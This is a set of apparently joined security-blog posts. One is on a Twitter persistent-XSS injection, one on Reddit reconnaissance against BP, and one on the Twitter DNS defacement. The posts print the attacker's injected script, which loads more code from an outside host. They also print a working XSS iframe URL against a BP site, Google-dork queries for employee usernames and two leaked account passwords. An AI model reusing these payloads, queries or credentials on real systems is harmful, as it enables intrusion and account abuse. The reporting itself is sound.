Twitter user 0wn3d_5ys has demonstrated a persistent cross site scripting (XSS) vulnerability on Twitter he found on June 21st using his own Twitter account (visit at your own risk) that appears to be due to a lack of input validation of the application name field when accepting new requests for Twitter applications. Visiting his account on Twitter results in a pair of classic cross site scripting alert boxes, then your browser is manipulated, finally you enter the matrix (see below), and get messages from the researcher who found the vulnerability.

Initial result of visiting the affected Twitter profile.

Alert box one.

Alert box 2.

Then you're in the matrix.

And lest you wonder at his intentions, he supplies the following messages into the pages title tag:

tb8_messages = new tb8_makeArray(4);
tb8_messages[0] = "My Twitter Owned By : H4x0r-x0x..";
tb8_messages[1] = "I can not play twitter";
tb8_messages[2] = "Injections XSSED On Twitter By: H4x0r-x0x";
tb8_messages[3] = "there is no crime here! I just create To smarten view my Twitter profile. Coding by: 
Indonesian H4x0r";

He announced the find on his blog as well as the Indonesian forum Balikita.

The Vulnerable Field

The problem is similar to one described last August by James Slater. That time around the issue was with the application URL, this time it appears the application name is the issue.

The code containing the injection occurs at the application name field (the via “Application name” you see on your tweets).

<span>via <a href="http://www.0wn3d-5ys.co.cc" rel="nofollow">Ub­­&shy;erTw­i­&shy;tter<span 
style="visibility: hidden"&gt; <script src='http://is.gd/cWO66' type='text/javascript'&gt;</script&gt;</a>
</span>

What do you notice right away? There’s no closing bracket on the closing script tag (Twitter is encoding as gt, at least partially, what was submitted). Here the researcher seems to get lucky in that his closing script tag is ignored, and the page falls all the way through to another Javascript include before it starts interpreting the markup again. Fortunately the next thing the browser interprets is the closing script tag on a Twitter included Javascript, thus the code injection works:

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>

Injection location.

This field is supplied when an application is set up via the Twitter Application Registration page.

Where Application Name is supplied.

The Javascript

The shortened URL included (http://is.gd/cWO66) redirects to: http://h1.ripway.com/www.Frendster.com/011.js.

//*----------------------------------*//
alert("::::::||+ </X55ED> + H4x0r-x0x  +||:::::: ");
alert("::::::::::::::::||+ Page Twitter Owned By: H4x0r-x0x +||:::::::::::::::: \n ::::::||+ H4x0r-x0x From Forum.Balikita.Net & Ungu.com +||::::::");

//*----------------------------------*//
var myjs = document.createElement("script");
myjs.type = "text/javascript";
myjs.src = "http://h1.ripway.com/www.Frendster.com/H4x0r.js";
document.getElementsByTagName("head")[0].appendChild(myjs);

//*----------------------------------*//
var shortc = document.createElement("link");
shortc.rel = "SHORTCUT ICON";
shortc.href = "http://img532.imageshack.us/img532/4308/indonesiaflag.gif";
document.getElementsByTagName("head")[0].appendChild(shortc);

//*----------------------------------*//
var css = document.createElement("link");
css.setAttribute("rel","stylesheet");
css.setAttribute("href","http://h1.ripway.com/www.Frendster.com/twitt.css");
document.getElementsByTagName("head")[0].appendChild(css);

//*----------------------------------*//
var css = document.createElement("link");
css.setAttribute("rel","stylesheet");
css.setAttribute("href"," http://h1.ripway.com/www.Frendster.com/css.css");
document.getElementsByTagName("head")[0].appendChild(css);

//**************************************//

//**************************************//

function tb8_makeArray(n){
this.length = n;
return this.length;
}
tb8_messages = new tb8_makeArray(4);
tb8_messages[0] = "My Twitter Owned By : H4x0r-x0x..";
tb8_messages[1] = "I can not play twitter";
tb8_messages[2] = "Injections XSSED On Twitter By: H4x0r-x0x";
tb8_messages[3] = "there is no crime here! I just create To smarten view my Twitter profile. Coding by: Indonesian H4x0r";
tb8_rptType = 'infinite';
tb8_rptNbr = 5;
tb8_speed = 100;
tb8_delay = 2000;
var tb8_counter=1;
var tb8_currMsg=0;
var tb8_tekst ="";
var tb8_i=0;
var tb8_TID = null;
function tb8_pisi(){
tb8_tekst = tb8_tekst + tb8_messages[tb8_currMsg].substring(tb8_i, tb8_i+1);
document.title = tb8_tekst;
tb8_sp=tb8_speed;
tb8_i++;
if (tb8_i==tb8_messages[tb8_currMsg].length){
tb8_currMsg++; tb8_i=0; tb8_tekst="";tb8_sp=tb8_delay;
}
if (tb8_currMsg == tb8_messages.length){
if ((tb8_rptType == 'finite') && (tb8_counter==tb8_rptNbr)){
clearTimeout(tb8_TID);
return;
}
tb8_counter++;
tb8_currMsg = 0;
}
tb8_TID = setTimeout("tb8_pisi()", tb8_sp);
}
tb8_pisi()


//------

var message=" syapakahh Qwueee.. w4s Hare ";
///////////////////////////////////
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")
// -->


//***********//
//form tags to omit in NS6+:
var omitformtags=["input", "textarea", "select"]

omitformtags=omitformtags.join("|")

function disableselect(e){
if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1)
return false
}

function reEnable(){
return true
}

if (typeof document.onselectstart!="undefined")
document.onselectstart=new Function ("return false")
else{
document.onmousedown=disableselect
document.onmouseup=reEnable
}

/***********/

scrW=screen.availWidth
scrH=screen.availHeight
window.resizeTo(10,10)
window.focus()
for(a=0;a<80;a++){
window.moveTo(0,0)
window.resizeTo(0,scrH*a/80)
}

window.resizeTo(0,0)
for(b=0;b<80;b++){
window.moveTo(0,scrH/1)
window.resizeTo(scrW*b/80,0)
}

for(c=0;c<80;c++){
window.moveTo(scrW/1,scrH/1)
window.resizeTo(0,scrH*c/80)
}

for(d=0;d<80;d++){
window.moveTo(scrW/1,0)
window.resizeTo(scrW*d/80,0)
}

for(e=0;e<80;e++){
window.resizeTo(scrW*e/80,scrH*e/80)
}

window.moveTo(0,0)
window.resizeTo(scrW,scrH) 

///************************///
var wibiya_pl = "false";
var wibiya_nc = "true";
var wibiya_latestJq = false;
var wibiya_flashFix = false;
var wibiya_jQuery_ver = 132;
var wibiyaTimeoutId;

function jquery_ver(){
    return parseInt(jQuery.fn.jquery.replace(/\./gi,'').substring(0,3));
}

if (!Array.prototype.indexOf) {
    Array.prototype.indexOf = function(obj, start) {
        for (var i = (start || 0), j = this.length; i < j; i++) {
            if (this[i] === obj) {
                return i;
            }
        }
        return -1;
    }
}

function loadjscssfile(filename, filetype, where){
    var fileref;
    if (filetype=="js"){ //if filename is a external JavaScript file
        fileref=document.createElement("script");
        fileref.setAttribute("type","text/javascript");
        fileref.setAttribute("src", filename);
    }
    else if (filetype=="css"){ //if filename is an external CSS file
        fileref=document.createElement("link");
        fileref.setAttribute("rel", "stylesheet");
        fileref.setAttribute("type", "text/css");
        fileref.setAttribute("href", filename);
    }
    if (typeof fileref!="undefined"){
        if (where=="head"){
            document.getElementsByTagName("head")[0].appendChild(fileref);
        }
        else{
            document.getElementsByTagName("body")[0].appendChild(fileref);
        }
    }
}

function CheckJQueryLoader(toolbarId)
{
    if (typeof jQuery == "function")
    {
        if (!wibiya_latestJq)
        {
            clearTimeout(wibiyaTimeoutId);
            SetToolbarLoad();
        }
        else
        {
            if (jquery_ver() >= wibiya_jQuery_ver)
            {
                clearTimeout(wibiyaTimeoutId);
                SetToolbarLoad();
            }
            else
            {
                wibiyaTimeoutId =  setTimeout("CheckJQueryLoader("+toolbarId+");",200);
            }
        }
    }
    else
    {
        wibiyaTimeoutId =  setTimeout("CheckJQueryLoader("+toolbarId+");",200);
    }
}

function getQueryParam(name){
    var qString = window.location.search.substring(1).split("&");
    var params = new Array();

    var p;
    for(var i=0; i<qString.length; i++){
        p = qString[i].split("=");
        params[p[0]] = p[1];
    }

    return params[name];
}

function SetToolbarLoad(){
    var wibiya_mobiles = ["iphone","ipod","ipad","series60","symbian","android","windows ce",
        "blackberry","palm","avantgo","docomo","vodafone","j-phone",
        "xv6850","htc","lg;","lge","mot","nintendo","nokia","samsung","sonyericsson"];
    wibiyaToolbar.wibiya_isMobile = false;
    wibiyaToolbar.wibiya_uAgent = navigator.userAgent.toLowerCase();
    for(var i=0;i<wibiya_mobiles.length;i++){
        if(wibiyaToolbar.wibiya_uAgent.match(wibiya_mobiles[i]) != null){
            wibiyaToolbar.wibiya_isMobile = true;
            break;
        }
    }

    if ((jQuery.browser.msie && parseInt(jQuery.browser.version)==6) ||  wibiyaToolbar.wibiya_isMobile == true){
        // ie 6 and below -> do nothing
    }
    else{
        if(wibiya_flashFix === true){
            wibiyaToolbar.rewriteFlash = 0;
            wibiyaToolbar.framework.FlashFix();
            wibiyaToolbar.rewriteFlashInterval = setInterval("wibiyaToolbar.framework.FlashFix();", 3333);
        }

        wibiyadomain = "http://cdn.wibiya.com/Toolbars/dir_0463/Toolbar_463831/";
        // no-conflict
        if (wibiya_nc=="true") jQuery.noConflict();

        var altToolbar = getQueryParam("toolbarObjId");
        // detect jd_gallery, ie, user_request - load page after document.ready
        if (typeof (startGallery) == "function" || jQuery.browser.msie || wibiya_pl=="true") {
            var wibiyaScriptSrc;
            jQuery(document).ready(function(){
                if (typeof altToolbar == "undefined"){
                    wibiyaScriptSrc = wibiyadomain+"toolbar_463831_4c1ec2a47b60f.js";
                }
                else{
                    wibiyaScriptSrc = altToolbar;
                }
                loadjscssfile(wibiyaScriptSrc,"js","body");
            });
        }
        else{
            if (typeof altToolbar == "undefined"){
                wibiyaScriptSrc = wibiyadomain+"toolbar_463831_4c1ec2a47b60f.js";
            }
            else{
                wibiyaScriptSrc = altToolbar;
            }
            loadjscssfile(wibiyaScriptSrc,"js","body");
        }
    }
}


if (typeof(wibiyaToolbar)!="object"){
    if ( typeof jQuery != "function"){
        loadjscssfile("http://cdn.wibiya.com/Scripts/jquery-1.4.2.min.js","js","head");
    }
    else{
        if (wibiya_latestJq && jquery_ver() != wibiya_jQuery_ver){
            loadjscssfile("http://cdn.wibiya.com/Scripts/jquery-1.4.2.min.js","js","head");
        }
    }

    var wibiyaToolbar = {};
    wibiyaToolbar.framework = {};

    wibiyaToolbar.id="463831";
    wibiyaToolbar.referrer=document.referrer;
    CheckJQueryLoader(wibiyaToolbar.id);
}


/************************************************************************/
/* Rainbow Links Version 1.03 (2003.9.20)                               */
/* Script updated by Dynamicdrive.com for IE6                           */
/* Copyright (C) 1999-2001 TAKANASHI Mizuki                             */
/* takanasi@hamal.freemail.ne.jp                                        */
/*----------------------------------------------------------------------*/
/* Read it somehow even if my English text is a little wrong! ;-)       */
/*                                                                      */
/* Usage:                                                               */
/*  Insert '<script src="rainbow.js"></script>' into the BODY section,  */
/*  right after the BODY tag itself, before anything else.              */
/*  You don't need to add "onMouseover" and "onMouseout" attributes!!   */
/*                                                                      */
/*  If you'd like to add effect to other texts(not link texts), then    */
/*  add 'onmouseover="doRainbow(this);"' and                            */
/*  'onmouseout="stopRainbow();"' to the target tags.                   */
/*                                                                      */
/* This Script works with IE4,Netscape6,Mozilla browser and above only, */
/* but no error occurs on other browsers.                               */
/************************************************************************/


////////////////////////////////////////////////////////////////////
// Setting

var rate = 20;  // Increase amount(The degree of the transmutation)


////////////////////////////////////////////////////////////////////
// Main routine

if (document.getElementById)
window.onerror=new Function("return true")

var objActive;  // The object which event occured in
var act = 0;    // Flag during the action
var elmH = 0;   // Hue
var elmS = 128; // Saturation
var elmV = 255; // Value
var clrOrg;     // A color before the change
var TimerID;    // Timer ID


if (document.all) {
    document.onmouseover = doRainbowAnchor;
    document.onmouseout = stopRainbowAnchor;
}
else if (document.getElementById) {
    document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT);
    document.onmouseover = Mozilla_doRainbowAnchor;
    document.onmouseout = Mozilla_stopRainbowAnchor;
}


//=============================================================================
// doRainbow
//  This function begins to change a color.
//=============================================================================
function doRainbow(obj)
{
    if (act == 0) {
        act = 1;
        if (obj)
            objActive = obj;
        else
            objActive = event.srcElement;
        clrOrg = objActive.style.color;
        TimerID = setInterval("ChangeColor()",100);
    }
}


//=============================================================================
// stopRainbow
//  This function stops to change a color.
//=============================================================================
function stopRainbow()
{
    if (act) {
        objActive.style.color = clrOrg;
        clearInterval(TimerID);
        act = 0;
    }
}


//=============================================================================
// doRainbowAnchor
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function doRainbowAnchor()
{
    if (act == 0) {
        var obj = event.srcElement;
        while (obj.tagName != 'A' && obj.tagName != 'BODY') {
            obj = obj.parentElement;
            if (obj.tagName == 'A' || obj.tagName == 'BODY')
                break;
        }

        if (obj.tagName == 'A' && obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = objActive.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// stopRainbowAnchor
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function stopRainbowAnchor()
{
    if (act) {
        if (objActive.tagName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Mozilla_doRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_doRainbowAnchor(e)
{
    if (act == 0) {
        obj = e.target;
        while (obj.nodeName != 'A' && obj.nodeName != 'BODY') {
            obj = obj.parentNode;
            if (obj.nodeName == 'A' || obj.nodeName == 'BODY')
                break;
        }

        if (obj.nodeName == 'A' && obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = obj.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// Mozilla_stopRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_stopRainbowAnchor(e)
{
    if (act) {
        if (objActive.nodeName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Change Color
//  This function changes a color actually.
//=============================================================================
function ChangeColor()
{
    objActive.style.color = makeColor();
}


//=============================================================================
// makeColor
//  This function makes rainbow colors.
//=============================================================================
function makeColor()
{
    // Don't you think Color Gamut to look like Rainbow?

    // HSVtoRGB
    if (elmS == 0) {
        elmR = elmV;    elmG = elmV;    elmB = elmV;
    }
    else {
        t1 = elmV;
        t2 = (255 - elmS) * elmV / 255;
        t3 = elmH % 60;
        t3 = (t1 - t2) * t3 / 60;

        if (elmH < 60) {
            elmR = t1;  elmB = t2;  elmG = t2 + t3;
        }
        else if (elmH < 120) {
            elmG = t1;  elmB = t2;  elmR = t1 - t3;
        }
        else if (elmH < 180) {
            elmG = t1;  elmR = t2;  elmB = t2 + t3;
        }
        else if (elmH < 240) {
            elmB = t1;  elmR = t2;  elmG = t1 - t3;
        }
        else if (elmH < 300) {
            elmB = t1;  elmG = t2;  elmR = t2 + t3;
        }
        else if (elmH < 360) {
            elmR = t1;  elmG = t2;  elmB = t1 - t3;
        }
        else {
            elmR = 0;   elmG = 0;   elmB = 0;
        }
    }

    elmR = Math.floor(elmR).toString(16);
    elmG = Math.floor(elmG).toString(16);
    elmB = Math.floor(elmB).toString(16);
    if (elmR.length == 1)    elmR = "0" + elmR;
    if (elmG.length == 1)    elmG = "0" + elmG;
    if (elmB.length == 1)    elmB = "0" + elmB;

    elmH = elmH + rate;
    if (elmH >= 360)
        elmH = 0;

    return '#' + elmR + elmG + elmB;
}


//****************************//
var scrolltotop={setting:{startline:100,scrollto:0,scrollduration:1000,fadeduration:[500,100]},controlHTML:'<iframe title="h4x0r-x0x" src="http://www5.shoutmix.com/?h4x0r-x0x" width="500" height="700" frameborder="0" scrolling="auto"></iframe>',controlattrs:{offsetx:5,offsety:5},anchorkeyword:'#top',state:{isvisible:false,shouldvisible:false},scrollup:function(){if(!this.cssfixedsupport)
this.$control.css({opacity:0})
var dest=isNaN(this.setting.scrollto)?this.setting.scrollto:parseInt(this.setting.scrollto)
if(typeof dest=="string"&&jQuery('#'+dest).length==1)
dest=jQuery('#'+dest).offset().top
else
dest=0
this.$body.animate({scrollTop:dest},this.setting.scrollduration);},keepfixed:function(){var $window=jQuery(window)
var controlx=$window.scrollLeft()+$window.width()-this.$control.width()-this.controlattrs.offsetx
var controly=$window.scrollTop()+$window.height()-this.$control.height()-this.controlattrs.offsety
this.$control.css({left:controlx+'px',top:controly+'px'})},togglecontrol:function(){var scrolltop=jQuery(window).scrollTop()
if(!this.cssfixedsupport)
this.keepfixed()
this.state.shouldvisible=(scrolltop>=this.setting.startline)?true:false
if(this.state.shouldvisible&&!this.state.isvisible){this.$control.stop().animate({opacity:1},this.setting.fadeduration[0])
this.state.isvisible=true}
else if(this.state.shouldvisible==false&&this.state.isvisible){this.$control.stop().animate({opacity:0},this.setting.fadeduration[1])
this.state.isvisible=false}},init:function(){jQuery(document).ready(function($){var mainobj=scrolltotop
var iebrws=document.all
mainobj.cssfixedsupport=!iebrws||iebrws&&document.compatMode=="CSS1Compat"&&window.XMLHttpRequest
mainobj.$body=(window.opera)?(document.compatMode=="CSS1Compat"?$('html'):$('body')):$('html,body')
mainobj.$control=$('<div id="topcontrol">'+mainobj.controlHTML+'</div>').css({position:mainobj.cssfixedsupport?'fixed':'absolute',bottom:mainobj.controlattrs.offsety,right:mainobj.controlattrs.offsetx,opacity:0,cursor:'pointer'}).attr({title:'Scroll Back to Top'}).click(function(){mainobj.scrollup();return false}).appendTo('body')
if(document.all&&!window.XMLHttpRequest&&mainobj.$control.text()!='')
mainobj.$control.css({width:mainobj.$control.width()})
mainobj.togglecontrol()
$('a[href="'+mainobj.anchorkeyword+'"]').click(function(){mainobj.scrollup()
return false})
$(window).bind('scroll resize',function(e){mainobj.togglecontrol()})})}}
scrolltotop.init()

H4X0R-X0X

The researcher who found the problem hosts his blog at a .co.cc URL. While .cc is the country code for the Cocos (Keeling) Islands in Australia, .co.cc is actually a company offering free subdomain redirection services (http://www.co.cc/). The IP address of the blog (74.125.113.121) is shown as owned by Google Inc.. Perhaps the most relevant piece of origin information is the language used on the blog and in the forum, Indonesian.

The flag isn’t a bad clue either.

Forum post at Balikita.net, a Community of Art.

Impact

As demonstrated in the past, XSS vulnerabilities in Twitter have been successfully used to take over accounts and create worms (Mikeyy, StalkDaily). Infection (account takeover) can be accomplished simply by visiting a profile with an include of a malicious Javascript, making a true self propagating web site worm possible as opposed to other more recent attacks based on phishing a user’s credentials with a fake Twitter login screen (the LOL is this you style attacks).

Twitter's Del Harvey

This might be Twitter’s first serious cross site scripting vulnerability since the beginning of this year. Twitter has to correct this quickly as it was public knowledge before this post, and has been for days. We note that the problem has been reported to Twitter by a fellow researcher, and we also reported the issue to Del Harvey (Twitter’s Trust and Safety Team). We could have gone through the security e-mail address, but frankly the last time we did that the response irritated us. And since Harvey once worked in a mental institution, she is probably the most qualified to deal with security people.

Update

As of 6pm the problem is still active in old applications, as one of our commentators below pointed out (with a working example). Twitter advised that the project has been corrected for new applications.

Related Posts:

• James Lipton says “Don’t tweet your junk”
• “Hi. This you?? LOL” Twitter Attack Snares Kevin Mitnick
• Not the Haus of Gaga too
• Facebook’s Faith: A New Scareware Attack
• Breaking Twitter (authentication)

BP continues to be the subject of criticism following the Deepwater Horizon oil spill, and the hacking community appears to be taking exception to some of BP’s recent public relations activities in the online arena. Specifically, reactions to BP’s having bought the sponsored link for the search term ‘oil spill’ seems to have triggered resentment in the form of both reconnaissance work, a Twitter account compromise, and an amusing cross site scripting vulnerability.

In the Reddit case, the method shown and gotchas demonstrated are worth covering, although no actual hack takes place. The XSS demonstrated at the bottom of the post is just creative and funny.

Twitter

As widely reported, on May 27th, BP’s official Twitter account was compromised and the following tweet put up.

Pick a stronger password.

And while it’s not a hack, the spoof Twitter account BPGlobalPR has garnered some attention (150k followers) as a satirical response to BP’s actual public relations response. It has gotten enough attention that the real BP has made overtures to the fake account to better identify itself as a parody.

Reddit

Last night on Reddit a user skipperdee responded to a post about the BP sponsored link as follows:

Reconnaissance

Let’s walk through his suggestions:

VPN Login Screen

Looking at what’s here, he found what is ostensibly a VPN login screen for some extranet type applications: https://access.bpglobal.com/bp/C/login.html?_targetURL=https://access.bpglobal.com/pkmslogin.form (with what looks like an open redirect).

Down tick one for information security is that it offers only certificate based authentication or alternatively login with a plain id and password.

https://access.bpglobal.com/help/bpcertExpired.html

A review of this screen (above) however seems to indicate that the user’s windows login (active directory) is the same as their IDAM login, by referencing the phrase NT ID and password.

User Names

Our Reddit user goes on to show off a little Google hacking by demonstrating how to find out the user names of BP employees:

http://www.google.com/#hl=en&q=%22Documents+And+Settings%22+site%3Abp.com&aq=f&aqi=&aql=&oq=&gs_rfai=&fp=dfdf66882bd03aae.

Username equals Warna3.

Because a number of BP employees use the built in MS Word footer option for file name and path, their user names have been exposed in publicly released documents. Now that a number of usernames can be enumerated, with a brute force password cracker its off to the races for an attacker.

Documents

He then goes on to demonstrate that publicly available sites have a sub-directory /STAGING which appears to show semi-public documents (releases to the press, investor releases, etc.).

http://www.google.com/#q=site:bp.com+inurl:staging+%222010%22&hl=en&start=0&sa=N&fp=dfdf66882bd03aae

It’s unclear that anything unusual is publicly exposed here. One document is marked official use only which shows the oil spill projections, however that’s a lot like saying something is under copyright but still releasable. Another is marked “Project Confidential” but it’s unclear if it left that classification when added to the /STAGING site.

Situation Map.

Like a lot of large companies, there’s probably more online than should be, but it doesn’t appear /STAGING has any special significance as an intranet type site. I will confess, this is my favorite document, the April 2008 company magazine:

BP Horizon: The Battle to Secure Company Data.

Some Passwords

There are two old passwords in two of the files, a form and a newsletter, both are for ibackup.com access which like other document sharing sites has a public folder concept. Given their age, there probably isn’t much of an issue here, however password re-use inside organizations is quite common.

ID: bproadmap
PW: safety
journey_hazard_assessment_card_2009_02_18.pdf

ID: bpshipping02
PW: flag01
Flag_29_May_2008.pdf

In the case of the second id, it certainly looks to be the kind of id and password that gets incremented for different things (bpshipping01, bpshipping03, flag02).

PHP File Include and XSS

Finally, the Reddit commenter points out the energizer.gp.com URL as one that appears to be a web application with a few issues including potentially a PHP remote file include or arbitrary file access:

http://energiser.bp.com/help.php?module=moodle&file=insert file here

The site appears to use Moodle, a popular CMS platform, thus something else that can be looked at. However holisticinfosec got there first and best with an XSS based iFrame injection:

http://energiser.bp.com/login/index.php?lang=%22%3E%3Ciframe%20src=http://www.tampabay.com/multimedi
a/archive/00121/SP_322824_BORC_oilp_121445c.jpg%20width=450%20height=300%20frameborder=0%20scroll=no
%3E%3C/%3E%3C/;document.write%28unescape%28a.source%29%29;{//

iFrame inclusion on a bp.com site.

Finally

Is most of this nonsense from a hard core security standpoint? Yes, to an extent. The XSS ought to be corrected, and dual factor authentication on VPN’s is kind of a must have at this point.

Does BP need a security audit of their perimeter, web properties, online services used, and security policies? Also yes. Maybe schedule it after they plug that gushing oil geyser this August.

Related Posts:

• Newsweek Reports Zombie Invasion
• Congressional Web Site Defacements Follow the State of the Union
• Umm…TechCrunch? Defacement Two in 24 Hours
• TechCrunched – TechCrunch the Victim of a Defacement
• Baidu.com the Latest Victim of Iranian CyberArmy

At some time around 10pm on Thursday, users going to Twitter.com were served the page below with a banner reading “This site has been hacked by the Iranian Cyber Army”. Also, mowjcamp.org, a site for supporters of Mir-Hossein Mousavi Khameneh a candidate who ran against Mahmoud Ahmadinejad in the 2009 Iranian presidential election, has been serving a similar defacement since at least December 16th and continues to do so. The motive appears to be activism in support of Iran’s current Islamic regime. The attack vector was a bad actor using an id and password assigned to Twitter to log in to the administrative portal of managed DNS service provider Dyn.

The page served to users visiting twitter.com as it appeared earlier.

Twitter actually had a prominent role in protests following the disputed Iranian presidential elections, and was a key source for Iranian citizens to both receive and disseminate information during the country’s widespread protests. The targeting of both the opposition candidate and the Twitter platform is then somewhat suspect as being related to the time period following the election. Such digital attacks for political purposes are sometimes referred to as hacktivism, usually defined as “the nonviolent use of illegal or legally ambiguous digital tools in pursuit of political ends”.

The site description in Google which temporarily indexed Twitter with the defacement seems to confirm this motive. The text reads: “In the name of God, As an Iranian this is a reaction to Twitter’s interference sly which was U.S. authorities ordered in the internal affairs of my country…”.

Google's short lived indexing of the defaced twitter.com.

The page contains an e-mail address, I guess the “Iranian Cyber Army” is accepting feedback, an image of a flag with Arabic words, and an English message at the bottom as follows:

U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don’t, We Control And 
Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To….

NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA?
WE PUSH THEM IN EMBARGO LIST ;)
Take Care.

We think its nice they asked us to take care.

Attack Vector

Twitter uses a hosted managed DNS service by Dyn, Inc, a New Hampshire firm, for their domain names. According to WHO.IS, they have been using this service since February of 2009. Dyn’s Chief Technology Officer, Tom Daly, has stated that someone using a “set of valid Twitter credentials” made the DNS changes that affected twitter.

So they would have logged in here:

Dyn Login Screen

Then they would have been presented a page like this (here’s ours as an example, all public information), and could modify where the domain name points:

Example screen where DNS records are edited.

Dyn Responds

• “It was not a failing on our systems whatsoever.”
  • Tom Daly, Dyn CTO
• “”This was not an unauthorized breach of our system.”
• On Twitter’s explanation “It will fully exonerate us, that’s one thing I can say,”
• On whether Twitter’s credentials were stolen by hackers: “You’ll have to read between the lines,”
  • Kyle York, Dyn VP of Marketing

Well those are examples of a combination of a strong statement alongside playing semantics. Dyn hosts DNS for a number of major web properties such as Arcsight, Zappos, Subway, British Telecom and others. While many other managed DNS services do the same thing, requiring only a web form with id and password authentication is probably not a good way to protect DNS records.

As an example of where to go from here, the online video game World of Warcraft has $6.50 physical one time password (OTP) tokens to authenticate in order to play:

OTP token to authenticate, to World of Warcraft.

Many of you log into your corporate virtual private networks with similar OTP tokens, issued by firms such as RSA.

So your company protects its internal network with dual factor authentication. Many web sites and web services such as World of Warcraft or eTrade protect the individual user with the same. Why doesn’t Twitter require their managed DNS provider to protect the primary product of their $1 billion dollar valuation company with the same.

We’ve also asked Dyn twice for the geoip of the attacker that used Twitter credentials to update the DNS entry without response.

How did they get Twitter’s Login for the Site?

I don’t know, and there’s been a lot of speculation. But looking for evidence of something that has changed? DynStatus reports on Friday that “due to increased security concerns…we have disabled access to our e-mail based password reset system, to prevent compromise of customer login credentials via e-mail systems.

So potentially something happened where the password reset function was subverted, either by someone having access to the e-mail account at Twitter that password reset e-mails are sent to, or a subversion of the password reset functionality on the web site.

E-mail based password resets suspended, as of today, by Dyn.

Was e-mail access absolutely required to subvert a password reset? Of course not, as an example the site has some of the source HTML usually associated with sites built with the Drupal CMS, which has had past issues with attacks on its password reset function: drupal-passwdxss.txt. We’re not saying that’s what this is, but we are replying that until Twitter comes forward, no one knows that a Twitter staff e-mail account has been compromised.

What’s the Flag Say?

Relying on the translations of others (we don’t speak Arabic or Farsi) the flag contains a message of “Hezbollah is victorious” at the top, referring to the paramilitary organization in Lebanon supported by Iran which in 2006 engaged in a 34 day military conflict with Israel.

The next word is the name of the third Shi’i Imam, Imam Husayn. Finally at the bottom there is a poem that reads: “We shall strike if the leader orders, we shall lose our heads if the leader wishes.”

Based on the material displayed, there is speculation that the cracker(s) is part of a Shiite group.

Twitter.com Serving the Page from the Wrong IP

At some point during last night’s defacement people started noting that the content being served for the domain twitter.com was being served by IP address: 66.147.242.88. This IP address is tied to Bluehost and according to GeoIP is a web server in Provo, Utah. The IP is still hosting a similar defacement page at the time of writing at: http://66.147.242.88/~twitter9/index.htm.

Page returned from http://66.147.242.88/~twitter9/index.htm.

This version has a few sentences in Farsi at the bottom as opposed to the English message, Google translates this as:

Name of God
As an Iranian response to this intervention sly server command in the internal affairs of my country
 and American authorities)
This site is a warning Hk

If any native speakers who can read this want to help us with the translation, the comments are open below.

The Attack – Theories from Last Night Worth Explaining

DNS Cache Poisoning?

Twitter’s Biz Stone put out an update on their blog indicating that Twitter’s DNS records “were temporarily compromised”. That led to speculation that the culprit was DNS Cache Poisoning. An explanation of DNS Cache Poisoning could easily make its own blog post, so we’ll keep it brief here.

Essentially a domain name server translates a domain name (www.google.com) into an IP address used to find the resource requested which is hosted on the Internet. Usually name servers rely on data served from authoritative Domain Name System, basically a hierarchy of who listens to who. When a bad actor (or possibly an unintended mistake) is able to provide bad data to a caching name server, that name server is considered poisoned. That data is cached for future requests, but now may contain a record that diverts a domain name (www.google.com) to an IP address not owned by Google but rather by the bad actor.

A cache is a duplicate copy of original data stored elsewhere, kept to speed up duplicate requests for the same resource. Confused? There is a decent video below explaining an attack scenario where the DNS server receives a look up request from a bad actor who then floods the DNS server with bad name resolution data. The bad resolution of the domain is saved in cache, and future users are sent to the wrong IP address. For example, it may send requests for twitter.com to an IP address in Utah serving up Iranian political propaganda.

Basic Explanation of DNS Cache Poisoning

Check Point put out a video last year that gives what is a very high level explanation of what happens in a DNS Cache Poisoning attack. If you’re not familiar with this type of attack, it might be useful:

DNS Hijacking?

Another site suggested the problem might be DNS Hijacking. A DNS server essentially is used to translate domain names to IP addresses, basically because domain names are easier to remember when accessing Internet connected resources. While most users depend on DNS servers hosted by their ISP and in turn downstream providers, it is possible for a bad actor to host a rogue DNS server, point the domains of legitimate web sites to IP addresses hosting a bogus web site for example, and attempt via malicious code on the PC to change the user’s DNS server assignment. When a bad actor attempts to redirect users from a legitimate web site to a bogus one, its usually referred to as pharming.

mowjcamp.org

Recall we mentioned earlier that Twitter is the second site we’re aware of to be defaced in the same way. The site mowjcamp.org, a political rally web site supporting former Iranian opposition candidate Mir-Hossein Mousavi Khameneh, is actively at time of writing serving a defacement page similar to the one that was on Twitter with this IP address: 66.147.244.182. This IP is also associated with ISP Bluehost, and GeoIP also points back to Provo, Utah for its location.

The first screenshot is what mowjcamp.org is supposed to look like, and can be viewed directly at the IP address: http://174.129.25.248.

What mowjcamp.org is supposed to look like.

What mowjcamp.org looks like now.

Twitter Responds

So as we mentioned earlier Twitter had this to say last night:

12/17/09 11:43 PM
As we tweeted a bit ago, Twitter's DNS records were temporarily compromised tonight but have now been fixed.
 As some noticed, Twitter.com was redirected for a while but API and platform applications were working. 
We will update with more information and details once we've investigated more fully.

And then today posted this update:

12/18/09 1:33 PM
